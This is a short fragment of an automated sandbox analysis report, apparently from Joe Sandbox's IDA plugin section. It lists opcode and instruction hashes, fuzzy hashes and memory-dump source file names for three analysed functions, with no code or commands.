                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                                            • Instruction ID: 0b0cf5e409085b8417ff15c56b88fadd5d26d8b19db0f3ea6ef1cb0f293f30be
                                                                                                            • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                                            • Instruction Fuzzy Hash: 9011CD72904240DFCB02CF84D5C0B1ABF71FB94324F2481ADD9094A257C33AD45ACBA2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.3360528240.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_15cd000_vdvfyt.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 93c1689486fcb2f71753587745096f662853eecc9a7506409c70da1826238261
                                                                                                            • Instruction ID: 96395811d45080c4ec57c522734a9d09abbcd1251260e4be27134606066188e9
                                                                                                            • Opcode Fuzzy Hash: 93c1689486fcb2f71753587745096f662853eecc9a7506409c70da1826238261
                                                                                                            • Instruction Fuzzy Hash: 5901A731104384EEE7104EA9DD84B66FFE8FF41A64F14846DEE099E286C3789844C6F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.3360528240.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_15cd000_vdvfyt.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: aba03d470b739f485ef2405c6792a8f6dc08270fbd59ac5aca603602062f21bd
                                                                                                            • Instruction ID: 7f1a7773742548d1bece80ae6bfb156645e7ffde726948c1233e6d47ee7c1c0d
                                                                                                            • Opcode Fuzzy Hash: aba03d470b739f485ef2405c6792a8f6dc08270fbd59ac5aca603602062f21bd
                                                                                                            • Instruction Fuzzy Hash: 27F0C271004384AEE7108E4ADC84B66FFE8EB81A24F18C05EEE084E282C3789844CBB1